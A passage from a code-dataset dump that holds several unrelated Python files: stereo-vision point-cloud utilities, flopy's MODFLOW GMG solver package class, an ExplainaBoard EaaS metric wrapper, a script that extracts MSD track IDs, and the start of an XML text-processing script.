0:\n continue\n\n # Get the color from the left frame to color the point cloud\n color = left_frame_color[j, i]\n\n # Calculate the depth\n depth = focal_length * baseline / normalized_disparity\n\n # Calculate the x, y, z coordinates\n # Calculate the x coordinate\n x = ((i - u0) / columns) * (depth / focal_length)\n\n # Calculate the y coordinate\n y = -((j - v0) / rows) * (depth / focal_length)\n\n # The z coordinate is the depth\n z = depth\n\n if z > 0:\n # Append the vertices and the colors\n vertices.append([scale * x, scale * y, -scale * z])\n colors.append(np.array(color) / 255.0)\n\n vertices = np.stack(vertices)\n colors = np.stack(colors)\n return vertices, colors\n\n\n# Function that de-noises the point cloud using DBSCAN\ndef denoiseWithClustering(vertices: np.ndarray, colors: np.ndarray, eps: float, samples: int = 10):\n \"\"\"\n Denoise the point cloud using DBSCAN\n :param vertices: The vertices of the point cloud\n :param colors: The colors of the point cloud\n :param eps: The epsilon parameter of DBSCAN (maximum distance between two samples)\n :param samples: The minimum number of samples in a neighborhood for a point to be considered as a core point\n :return: Return the de-noised point cloud\n \"\"\"\n # Create the DBSCAN object\n labels = DBSCAN(eps=eps, min_samples=samples).fit(vertices)\n\n # Get the labels\n labels = labels.labels_\n\n # Get the unique labels\n vertices = vertices[labels > -1]\n\n # Get the unique colors\n colors = colors[labels > -1]\n\n return vertices, colors\n\n\n# Function that transforms a rgb image to grayscale\ndef rgb2gray(rgb: np.ndarray):\n \"\"\"\n Convert an RGB image to grayscale.\n\n Args:\n rgb (np.ndarray): RGB image.\n\n Returns:\n np.ndarray: Grayscale image.\n \"\"\"\n return rgb.mean(axis=2)\n\n\n# Function that downscales an image\ndef downscale(image: np.ndarray):\n \"\"\"\n Downscale an image\n\n Args:\n image (np.ndarray): Image to downscale.\n\n Returns:\n np.ndarray: Downscaled image.\n \"\"\"\n\n # Check if the image is grayscale or RGB\n if len(image.shape) == 2:\n # Grayscale image\n # Create the kernel\n kernel = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]]) / 16\n\n # Downscale the image\n image = convolve(image, kernel)\n image = image[::2, ::2]\n\n elif len(image.shape) == 3:\n # RGB image\n # Create the kernel\n kernel = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]]) / 16\n\n # Downscale the image\n image = convolve(image, kernel[:, :, None])\n image = image[::2, ::2, :]\n\n else:\n raise ValueError(\"The image must be grayscale or RGB\")\n\n return image\n\n\n# Function that applies gaussian smoothing to an image\ndef gaussianSmoothing(image: np.ndarray):\n \"\"\"\n Gaussian smoothing\n :param image: The disparity map\n :return: The smoothed disparity map\n \"\"\"\n # Create the kernel\n kernel = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]]) / 16\n\n # Convolve the disparity map with the kernel\n smoothed_disparity_map = convolve(image, kernel)\n\n return smoothed_disparity_map\n\n\n# Function that finds the nearest neighbor of a point with a kd-tree\ndef find_nearest_neighbor_with_kd_tree(points: np.ndarray, kdtree: kd_tree):\n \"\"\"\n Find the nearest neighbor of a point with a kd tree\n :param points: The coordinates of the points of the point cloud\n :param kdtree: The kd tree\n :return: The distance and the index of the nearest neighbor\n \"\"\"\n # Get the number of points\n N = points.shape[0]\n\n # Get a random index\n ind = np.random.randint(N)\n\n # Find the nearest neighbor with the kd tree\n start_time = time.time()\n best_distance, best_index = kdtree.find_nearest_neighbor(points, ind)\n print(\"Time to find the nearest neighbour with the kd tree\", time.time() - start_time, \"seconds\")\n\n # Return the distance and the index of the nearest neighbor\n return best_distance, best_index\n\n\n# Function that finds the k nearest neighbors of a point with a kd-tree\ndef find_k_nearest_neighbors_with_kd_tree(points: np.ndarray, kdtree: kd_tree, k: int = 8):\n \"\"\"\n Find the k nearest neighbors for all the points in the dataset\n :param points: The coordinates of the points of the point cloud\n :param kdtree: The kd tree\n :param k: The number of neighbors\n :return: Return the indices and the distances of the k nearest neighbors\n \"\"\"\n # Get the number of points\n N = points.shape[0]\n\n # Set a numpy array to store the indices of the k nearest neighbors\n indices = np.zeros((N, k)).astype('int32')\n\n # Set a numpy array to store the distances of the k nearest neighbors\n distances = np.zeros((N, k))\n\n # Find the k nearest neighbors for all the points with the kd tree\n start_time = time.time()\n for i in tqdm(range(N)):\n # Find the k nearest neighbors with the kd tree\n k_distances, k_indices = kdtree.find_k_nearest_neighbors(points, i, k)\n\n # Store the indices\n indices[i] = k_indices\n # Store the distances\n distances[i] = k_distances\n\n # Print the time\n print(\"Time to find the k nearest neighbours for all the points with the kd tree\", time.time() - start_time,\n \"seconds\")\n\n # Return the indices and the distances\n return indices, distances\n\n\n# Function that finds which dataset the user has chosen depending on the artificial point cloud choice\ndef getDataForUsersPointCloudChoice(artificial_pointcloud_choice: str):\n \"\"\"\n Find which dataset the user has chosen depending on the artificial point cloud choice\n :param artificial_pointcloud_choice: The choice of the user\n :return: The pointcloud, the distance threshold, the epsilon and the minimum number of samples for the DBSCAN\n and a variable tha says if the pointcloud should be re-centered or not\n \"\"\"\n # Check if the user has chosen the first dataset\n if artificial_pointcloud_choice == \"1\":\n # The user has chosen the playground dataset\n distance_threshold = 0.15\n epsilon = 2\n min_samples = 100\n recenter = True\n return pcds.the_play_ground, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the second dataset\n elif artificial_pointcloud_choice == \"2\":\n # The user has chosen the researcher desk\n distance_threshold = 0.01\n epsilon = 0.01\n min_samples = 5\n recenter = False\n return pcds.the_researcher_desk, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the third dataset\n elif artificial_pointcloud_choice == \"3\":\n # The use has chosen the adas lidar dataset\n distance_threshold = 0.7\n epsilon = 2\n min_samples = 20\n recenter = True\n return pcds.the_adas_lidar, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the fourth dataset\n elif artificial_pointcloud_choice == \"4\":\n # The user has chosen the kitchen dataset (with walls)\n distance_threshold = 0.05\n epsilon = 0.05\n min_samples = 5\n recenter = False\n return pcds.tls_kitchen, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the fifth dataset\n elif artificial_pointcloud_choice == \"5\":\n # The user has chosen the kitchen dataset (without walls)\n distance_threshold = 0.01\n epsilon = 0.04\n min_samples = 20\n recenter = True\n return pcds.tls_kitchen_sample, distance_threshold, epsilon, min_samples, recenter\n\n # Else the choice is not valid\n else:\n return False, False, False, False, False\n\n\ndef getDataForUsersStereoImagesChoice(stereo_images_choice: str):\n \"\"\"\n Find which dataset the user has chosen depending on the stereo images choice\n :param stereo_images_choice: The choice of the user\n :return:\n \"\"\"\n data_path = \"data/\"\n # Check if the user has chosen the first dataset\n if stereo_images_choice == \"1\":\n # The user has chosen the first dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_78, cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.kitty_78, cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_78)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 8\n # Set the parameters for the reconstruction\n baseline = np.array([0.54, 0, 0])\n # Set the parameters for the fov (we don't have the fov)\n fov = 0.0\n # Set the parameters for RANSAC\n d_threshold = 0.15\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 0.1\n min_samples = 10\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 0.2\n clustering_min_samples = 100\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = True\n # Get the calibration matrices\n cam1, cam2 = loadCalib(data_path + stereoPairs.calibFolder + stereoPairs.calib_78)\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n elif stereo_images_choice == \"2\":\n # The user has chosen the second dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_89, cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.kitty_89, cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_89)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 8\n # Set the parameters for the reconstruction\n baseline = np.array([0.54, 0, 0])\n # Set the parameters for the fov (we don't have the fov)\n fov = 0.0\n # Set the parameters for RANSAC\n d_threshold = 0.2\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 0.1\n min_samples = 10\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 0.5\n clustering_min_samples = 100\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = True\n # Get the calibration matrices\n cam1, cam2 = loadCalib(data_path + stereoPairs.calibFolder + stereoPairs.calib_89)\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n elif stereo_images_choice == \"3\":\n # The user has chosen the third dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_102, cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.kitty_102, cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_102)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 8\n # Set the parameters for the reconstruction\n baseline = np.array([0.54, 0, 0])\n # Set the parameters for the fov (we don't have the fov)\n fov = 0.0\n # Set the parameters for RANSAC\n d_threshold = 0.2\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 0.1\n min_samples = 10\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 0.4\n clustering_min_samples = 100\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = True\n # Get the calibration matrices\n cam1, cam2 = loadCalib(data_path + stereoPairs.calibFolder + stereoPairs.calib_102)\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n elif stereo_images_choice == \"4\":\n # The user has chosen the first dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.storage_left,\n cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.storage_right,\n cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.storage_left)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 5\n # Set the parameters for the reconstruction\n baseline = 0.2\n fov = 1.2\n # Set the parameters for RANSAC\n d_threshold = 0.1\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 10\n min_samples = 50\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 3.5\n clustering_min_samples = 30\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = False\n # Get the calibration matrices (we don't have the calibration matrices)\n cam1, cam2 = None, None\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n else:\n # The choice is not valid\n return False, False, False, False, False, False, False, False, False, False, False, False, False, False, False\n\n\ndef points_distance(p1, p2) -> float:\n \"\"\"\n Calculate the distance between two getPoints\n :param p1: The first point\n :param p2: The second point\n :return: The distance between the two getPoints\n \"\"\"\n return math.sqrt((p2.x - p1.x)**2 + (p2.y - p1.y)**2 + (p2.z - p1.z)**2)\n\n\n# Calculate the distance between a point and an edge\ndef point_to_edge_distance(point, edge) -> float:\n \"\"\"\n Calculate the distance between a point and an edge\n :param point: The point\n :param edge: The edge\n :return: The distance between the point and the edge\n \"\"\"\n v1 = [edge.p1.x - point.x, edge.p1.y - point.y, edge.p1.z - point.z]\n v2 = [edge.p1.x - edge.p2.x, edge.p1.y - edge.p2.y, edge.p1.z - edge.p2.z]\n return np.linalg.norm(np.cross(v1, v2)) / np.linalg.norm(v2)\n","repo_name":"Kalaitzo/Stereo-Vision","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":21763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27127049982","text":"\"\"\"\nmfgmg module. Contains the ModflowGmg class. Note that the user can access\nthe ModflowGmg class as `flopy.modflow.ModflowGmg`.\n\nAdditional information for this MODFLOW package can be found at the `Online\nMODFLOW Guide\n`_.\n\n\"\"\"\nfrom ..pakbase import Package\n\n\nclass ModflowGmg(Package):\n \"\"\"\n MODFLOW GMG Package Class.\n\n Parameters\n ----------\n model : model object\n The model object (of type :class:`flopy.modflow.mf.Modflow`) to which\n this package will be added.\n mxiter : int\n maximum number of outer iterations. (default is 50)\n iiter : int\n maximum number of inner iterations. (default is 30)\n iadamp : int\n is a flag that controls adaptive damping. The possible values\n of iadamp are.\n\n If iadamp = 0, then the value assigned to DAMP is used as a constant\n damping parameter.\n\n If iadamp = 1, the value of damp is used for the first nonlinear\n iteration. The damping parameter is adaptively varied on the basis\n of the head change, using Cooley's method as described in Mehl\n and Hill (2001), for subsequent iterations.\n\n If iadamp = 2, the relative reduced residual damping method documented\n in Mehl and Hill (2001) and modified by Banta (2006) is used.\n\n When iadamp is specified as 2 and the value specified for DAMP is less\n than 0.5, the closure criterion for the inner iterations (drclose) is\n assigned simply as rclose. When damp is between 0.5 and 1.0, inclusive,\n or when iadamp is specified as 0 or 1, drclose is calculated according\n to equation 20 on p. 9 of Wilson and Naff (2004).\n hclose : float\n is the head change criterion for convergence. (default is 1e-5).\n rclose : float\n is the residual criterion for convergence. (default is 1e-5)\n relax : float\n is a relaxation parameter for the ILU preconditioned conjugate\n gradient method. The relax parameter can be used to improve the\n spectral condition number of the ILU preconditioned system. The value\n of relax should be approximately one. However, the relaxation parameter\n can cause the factorization to break down. If this happens, then the\n gmg solver will report an assembly error and a value smaller than one\n for relax should be tried. This item is read only if isc = 4.\n ioutgmg : int\n is a flag that controls the output of the gmg solver. The\n possible values of ioutgmg are.\n\n If ioutgmg = 0, then only the solver inputs are printed.\n\n If ioutgmg = 1, then for each linear solve, the number of pcg\n iterations, the value of the damping parameter, the l2norm of\n the residual, and the maxnorm of the head change and its location\n (column, row, layer) are printed. At the end of a time/stress period,\n the total number of gmg calls, pcg iterations, and a running total\n of pcg iterations for all time/stress periods are printed.\n\n If ioutgmg = 2, then the convergence history of the pcg iteration is\n printed, showing the l2norm of the residual and the convergence factor\n for each iteration.\n\n ioutgmg = 3 is the same as ioutgmg = 1 except output is sent to the\n terminal instead of the modflow list output file.\n\n ioutgmg = 4 is the same as ioutgmg = 2 except output is sent to the\n terminal instead of the modflow list output file.\n\n (default is 0)\n iunitmhc : int\n is a flag and a unit number, which controls output of maximum\n head change values. If iunitmhc = 0, maximum head change values\n are not written to an output file. If iunitmhc > 0, maximum head\n change values are written to unit iunitmhc. Unit iunitmhc should\n be listed in the Name file with 'DATA' as the file type. If\n iunitmhc < 0 or is not present, iunitmhc defaults to 0.\n (default is 0)\n ism : int\n is a flag that controls the type of smoother used in the multigrid\n preconditioner. If ism = 0, then ilu(0) smoothing is implemented in\n the multigrid preconditioner; this smoothing requires an additional\n ector on each multigrid level to store the pivots in the ilu\n factorization. If ism = 1, then symmetric gaussseidel (sgs) smoothing\n is implemented in the multigrid preconditioner. No additional storage\n is required if ism = 1; users may want to use this option if available\n memory is exceeded or nearly exceeded when using ism = 0. Using sgs\n smoothing is not as robust as ilu smoothing; additional iterations are\n likely to be required in reducing the residuals. In extreme cases, the\n solver may fail to converge as the residuals cannot be reduced\n sufficiently. (default is 0)\n isc : int\n is a flag that controls semicoarsening in the multigrid\n preconditioner. If isc = 0, then the rows, columns and layers are\n all coarsened. If isc = 1, then the rows and columns are coarsened,\n but the layers are not. If isc = 2, then the columns and layers are\n coarsened, but the rows are not. If isc = 3, then the rows and layers\n are coarsened, but the columns are not. If isc = 4, then there is no\n coarsening. Typically, the value of isc should be 0 or 1. In the case\n that there are large vertical variations in the hydraulic\n conductivities, then a value of 1 should be used. If no coarsening is\n implemented (isc = 4), then the gmg solver is comparable to the pcg2\n ilu(0) solver described in Hill (1990) and uses the least amount of\n memory. (default is 0)\n damp : float\n is the value of the damping parameter. For linear problems, a value\n of 1.0 should be used. For nonlinear problems, a value less than 1.0\n but greater than 0.0 may be necessary to achieve convergence. A typical\n value for nonlinear problems is 0.5. Damping also helps control the\n convergence criterion of the linear solve to alleviate excessive pcg\n iterations. (default 1.)\n dup : float\n is the maximum damping value that should be applied at any iteration\n when the solver is not oscillating; it is dimensionless. An appropriate\n value for dup will be problem-dependent. For moderately nonlinear\n problems, reasonable values for dup would be in the range 0.5 to 1.0.\n For a highly nonlinear problem, a reasonable value for dup could be as\n small as 0.1. When the solver is oscillating, a damping value as large\n as 2.0 x DUP may be applied. (default is 0.75)\n dlow : float\n is the minimum damping value to be generated by the adaptive-damping\n procedure; it is dimensionless. An appropriate value for dlow will be\n problem-dependent and will be smaller than the value specified for dup.\n For a highly nonlinear problem, an appropriate value for dlow might be\n as small as 0.001. Note that the value specified for the variable,\n chglimit, could result in application of a damping value smaller than\n dlow. (default is 0.01)\n chglimit : float\n is the maximum allowed head change at any cell between outer\n iterations; it has units of length. The effect of chglimit is to\n determine a damping value that, when applied to all elements of the\n head-change vector, will produce an absolute maximum head change equal\n to chglimit. (default is 1.0)\n extension : list string\n Filename extension (default is 'gmg')\n unitnumber : int\n File unit number (default is None).\n filenames : str or list of str\n Filenames to use for the package and the output files. If\n filenames=None the package name will be created using the model name\n and package extension and the gmg output name will be created using\n the model name and .cbc extension (for example, modflowtest.gmg.out),\n if iunitmhc is a number greater than zero. If a single string is passed\n the package will be set to the string and gmg output names will be\n created using the model name and .gmg.out extension, if iunitmhc is a\n number greater than zero. To define the names for all package files\n (input and output) the length of the list of strings should be 2.\n Default is None.\n\n Returns\n -------\n None\n\n Attributes\n ----------\n\n Methods\n -------\n\n See Also\n --------\n\n Notes\n -----\n\n Examples\n --------\n\n >>> import flopy\n >>> m = flopy.modflow.Modflow()\n >>> gmg = flopy.modflow.ModflowGmg(m)\n\n\n \"\"\"\n\n def __init__(\n self,\n model,\n mxiter=50,\n iiter=30,\n iadamp=0,\n hclose=1e-5,\n rclose=1e-5,\n relax=1.0,\n ioutgmg=0,\n iunitmhc=None,\n ism=0,\n isc=0,\n damp=1.0,\n dup=0.75,\n dlow=0.01,\n chglimit=1.0,\n extension=\"gmg\",\n unitnumber=None,\n filenames=None,\n ):\n # set default unit number of one is not specified\n if unitnumber is None:\n unitnumber = ModflowGmg._defaultunit()\n\n # set filenames\n filenames = self._prepare_filenames(filenames, 2)\n\n # update external file information with gmg output, if necessary\n if iunitmhc is not None:\n model.add_output_file(\n iunitmhc,\n fname=filenames[1],\n extension=\"gmg.out\",\n binflag=False,\n package=self._ftype(),\n )\n else:\n iunitmhc = 0\n\n # call base package constructor\n super().__init__(\n model,\n extension=extension,\n name=self._ftype(),\n unit_number=unitnumber,\n filenames=filenames[0],\n )\n\n # check if a valid model version has been specified\n if model.version == \"mfusg\":\n err = \"Error: cannot use {} package with model version {}\".format(\n self.name, model.version\n )\n raise Exception(err)\n\n self._generate_heading()\n self.url = \"gmg.html\"\n\n self.mxiter = mxiter\n self.iiter = iiter\n self.iadamp = iadamp\n self.hclose = hclose\n self.rclose = rclose\n self.relax = relax\n self.ism = ism\n self.isc = isc\n self.dup = dup\n self.dlow = dlow\n self.chglimit = chglimit\n self.damp = damp\n self.ioutgmg = ioutgmg\n self.iunitmhc = iunitmhc\n self.parent.add_package(self)\n\n def write_file(self):\n \"\"\"\n Write the package file.\n\n Returns\n -------\n None\n\n \"\"\"\n f_gmg = open(self.fn_path, \"w\")\n f_gmg.write(f\"{self.heading}\\n\")\n # dataset 0\n f_gmg.write(\n f\"{self.rclose} {self.iiter} {self.hclose} {self.mxiter}\\n\"\n )\n # dataset 1\n f_gmg.write(\n f\"{self.damp} {self.iadamp} {self.ioutgmg} {self.iunitmhc}\\n\"\n )\n # dataset 2\n f_gmg.write(f\"{self.ism} {self.isc} \")\n if self.iadamp == 2:\n f_gmg.write(f\"{self.dup} {self.dlow} {self.chglimit}\")\n f_gmg.write(\"\\n\")\n # dataset 3\n f_gmg.write(f\"{self.relax}\\n\")\n f_gmg.close()\n\n @classmethod\n def load(cls, f, model, ext_unit_dict=None):\n \"\"\"\n Load an existing package.\n\n Parameters\n ----------\n f : filename or file handle\n File to load.\n model : model object\n The model object (of type :class:`flopy.modflow.mf.Modflow`) to\n which this package will be added.\n ext_unit_dict : dictionary, optional\n If the arrays in the file are specified using EXTERNAL,\n or older style array control records, then `f` should be a file\n handle. In this case ext_unit_dict is required, which can be\n constructed using the function\n :class:`flopy.utils.mfreadnam.parsenamefile`.\n\n Returns\n -------\n gmg : ModflowGmg object\n\n Examples\n --------\n\n >>> import flopy\n >>> m = flopy.modflow.Modflow()\n >>> gmg = flopy.modflow.ModflowGmg.load('test.gmg', m)\n\n \"\"\"\n\n if model.verbose:\n print(\"loading gmg package file...\")\n\n openfile = not hasattr(f, \"read\")\n if openfile:\n filename = f\n f = open(filename, \"r\")\n\n # dataset 0 -- header\n while True:\n line = f.readline()\n if line[0] != \"#\":\n break\n # dataset 0\n t = line.strip().split()\n rclose = float(t[0])\n iiter = int(t[1])\n hclose = float(t[2])\n mxiter = int(t[3])\n # dataset 1\n line = f.readline()\n t = line.strip().split()\n damp = float(t[0])\n iadamp = int(t[1])\n ioutgmg = int(t[2])\n try:\n iunitmhc = int(t[3])\n except:\n iunitmhc = 0\n # dataset 2\n line = f.readline()\n t = line.strip().split()\n ism = int(t[0])\n isc = int(t[1])\n dup, dlow, chglimit = 0.75, 0.01, 1.0\n if iadamp == 2:\n dup = float(t[2])\n dlow = float(t[3])\n chglimit = float(t[4])\n # dataset 3\n line = f.readline()\n t = line.strip().split()\n relax = 1.0\n if ism == 4:\n relax = float(t[0])\n\n if openfile:\n f.close()\n\n # determine specified unit number\n unitnumber = None\n filenames = [None, None]\n if ext_unit_dict is not None:\n unitnumber, filenames[0] = model.get_ext_dict_attr(\n ext_unit_dict, filetype=ModflowGmg._ftype()\n )\n if iunitmhc > 0:\n iu, filenames[1] = model.get_ext_dict_attr(\n ext_unit_dict, unit=iunitmhc\n )\n model.add_pop_key_list(iunitmhc)\n\n return cls(\n model,\n mxiter=mxiter,\n iiter=iiter,\n iadamp=iadamp,\n hclose=hclose,\n rclose=rclose,\n relax=relax,\n ioutgmg=ioutgmg,\n iunitmhc=iunitmhc,\n ism=ism,\n isc=isc,\n damp=damp,\n dup=dup,\n dlow=dlow,\n chglimit=chglimit,\n unitnumber=unitnumber,\n )\n\n @staticmethod\n def _ftype():\n return \"GMG\"\n\n @staticmethod\n def _defaultunit():\n return 27\n","repo_name":"modflowpy/flopy","sub_path":"flopy/modflow/mfgmg.py","file_name":"mfgmg.py","file_ext":"py","file_size_in_byte":14728,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"27"} +{"seq_id":"26849958645","text":"from __future__ import annotations\n\nimport copy\nfrom dataclasses import dataclass\nfrom typing import Any, cast, final, Optional\n\nfrom eaas.async_client import AsyncClient, AsyncRequest\nfrom eaas.config import Config\nimport numpy as np\nimport sacrebleu\n\nfrom explainaboard.metrics.metric import Metric, MetricConfig, MetricStats\nfrom explainaboard.metrics.registry import metric_config_registry\n\n_eaas_config = None\n_eaas_client = None\n\n\ndef get_eaas_client():\n global _eaas_config, _eaas_client\n if not _eaas_client:\n _eaas_config = Config()\n _eaas_client = AsyncClient(_eaas_config)\n return _eaas_client\n\n\n@final\nclass EaaSMetricStats(MetricStats):\n \"\"\"MetricStats with EaaS invocations.\n\n Obtaining the data from EaaS is deferred until it is wanted.\n \"\"\"\n\n def __init__(self, name: str, pos: int, eaas_request: AsyncRequest) -> None:\n \"\"\"Initializes the EaaSMetricStats.\n\n Args:\n name: Name of this metric.\n pos: Position of the statistics in the returned array.\n eaas_request: Request object to the EaaS service.\n \"\"\"\n self._name = name # TODO(odashi): Remove this member.\n self._pos = pos\n self._eaas_request = eaas_request\n self._data: np.ndarray | None = None\n\n def _fetch_results(self) -> None:\n \"\"\"Obtains the data from the EaaS service.\"\"\"\n if self._data is None:\n result = self._eaas_request.get_result()\n self._data = np.array(\n [\n x if isinstance(x, list) else [x]\n for x in result['scores'][self._pos]['stats']\n ]\n )\n\n def __len__(self) -> int:\n \"\"\"See MetricStats.__len__.\"\"\"\n return len(self.get_data())\n\n def is_batched(self) -> bool:\n \"\"\"See MetricStats.is_batched.\"\"\"\n return False\n\n def num_statistics(self) -> int:\n \"\"\"See MetricStats.num_statistics.\"\"\"\n return self.get_data().shape[-1]\n\n def get_data(self) -> np.ndarray[tuple[int, int], Any]:\n \"\"\"See MetricStats.get_data.\"\"\"\n self._fetch_results()\n # self._data must have the data at this point.\n return cast(np.ndarray, self._data)\n\n def get_batch_data(self) -> np.ndarray[tuple[int, int, int], Any]:\n \"\"\"See MetricStats.get_batch_data.\"\"\"\n raise NotImplementedError\n\n\n@dataclass\n@metric_config_registry.register(\"EaaSMetricConfig\")\nclass EaaSMetricConfig(MetricConfig):\n def to_metric(self):\n return EaaSMetric(self)\n\n\nclass EaaSMetric(Metric):\n \"\"\"\n A metric that calculates evaluation scores using EaaS.\n \"\"\"\n\n _NOT_SIMPLE_METRICS = {'bleu', 'chrf', 'length_ratio', 'length'}\n\n def calc_metric_from_aggregate(\n self, agg_stats: np.ndarray, config: Optional[MetricConfig] = None\n ) -> np.ndarray:\n if agg_stats.ndim == 1:\n agg_stats = agg_stats.reshape((1, agg_stats.shape[0]))\n n_samples = agg_stats.shape[0]\n if self.config.name in {'bleu', 'chrf'}:\n ret_metric = np.zeros(n_samples)\n metric_class = (\n sacrebleu.BLEU() if self.config.name == 'bleu' else sacrebleu.CHRF()\n )\n for i, single_stat in enumerate(agg_stats):\n ret_metric[i] = (\n metric_class._compute_score_from_stats(list(single_stat)).score\n / 100.0\n )\n return ret_metric\n elif self.config.name == 'length_ratio':\n return agg_stats[:, 0] / agg_stats[:, 1]\n elif self.config.name == 'length':\n return agg_stats[:, 0]\n else:\n return agg_stats\n\n def is_simple_average(self, stats: MetricStats):\n return self.config.name not in self._NOT_SIMPLE_METRICS\n\n def aggregate_stats(self, stats: MetricStats) -> np.ndarray:\n \"\"\"\n Aggregate sufficient statistics from multiple examples into a single example\n :param stats: stats for every example\n :return: aggregated stats\n \"\"\"\n data = stats.get_batch_data() if stats.is_batched() else stats.get_data()\n if self.config.name in {'bleu', 'chrf'}:\n return np.sum(data, axis=-2)\n else:\n return np.mean(data, axis=-2)\n\n def calc_stats_from_data(\n self, true_data: list, pred_data: list, config: Optional[MetricConfig] = None\n ) -> MetricStats:\n # Note that it's better to batch requests when possible, e.g. as in\n # `processors/conditional_generation.py`\n inputs = []\n for td, pd in zip(true_data, pred_data):\n ntd = copy.deepcopy(td)\n ntd['hypothesis'] = pd\n inputs.append(ntd)\n async_request = get_eaas_client().async_score(\n inputs,\n metrics=[self.config.name],\n calculate=['corpus', 'stats'],\n )\n return EaaSMetricStats(name=self.config.name, pos=0, eaas_request=async_request)\n","repo_name":"pfliu-nlp/ExplainaBoard-Debug","sub_path":"explainaboard/metrics/eaas.py","file_name":"eaas.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"6353966331","text":"from pathlib import Path\n\nimport fire\nfrom tqdm import tqdm\n\nfrom modules.dataset import _get_MSD_raw_dataset \nfrom modules.utils import save_json\n\n\ndef main(local=True, \n overwrite = False, \n out_dir = 'data_tfrecord'):\n \"\"\"\n Process the tfrecords MSD dataset to extract the track ids.\n Save list as json to out_path. \n \"\"\"\n \n if not overwrite: \n print(\"Use --overwrite True to overwrite existing output file.\")\n return\n \n else: \n dataset = _get_MSD_raw_dataset(local=local)\n track_ids = {}\n\n for data_example in tqdm(dataset):\n track_id = data_example['tid'].numpy()[0].decode('UTF-8')\n \n try:\n track_ids[track_id] += 1\n except KeyError:\n track_ids[track_id] = 1\n\n # Save list of track IDs\n list_of_track_ids = list(track_ids.keys())\n out_path = Path(out_dir) / \"waveforms_track_ids.json\"\n save_json(list_of_track_ids, out_path)\n\n return\n\n\nif __name__==\"__main__\":\n fire.Fire(main)\n","repo_name":"Gaspard-a11y/ArcSong","sub_path":"process_tfrecords.py","file_name":"process_tfrecords.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"574382868","text":"import collections\nimport re\nimport xml.etree.ElementTree as ET\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport spacy\n\n# nlp = en_core_web_sm.load(disable=['parser', 'ner'])\nnlp = spacy.load(\"en_core_web_sm\", disable=[\"parser\", \"ner\"])\n\npd.set_option('max_colwidth', 150)\n\ndata_dir = \"../output/oj/\"\nfile_name = \"reg_2016_679_akn.xml\"\n\n\ndef to_string_utf8(document):\n return document.decode('utf-8')\n\n\ndef get_doc_data(filepath):\n tree = ET.parse(filepath)\n document = ET.tostring(tree.getroot(), encoding='utf-8', method='text')\n document = to_string_utf8(document)\n document = re.sub('[ \\t\\n]+', ' ', document)\n return document\n\n\ndocContent = get_doc_data(data_dir 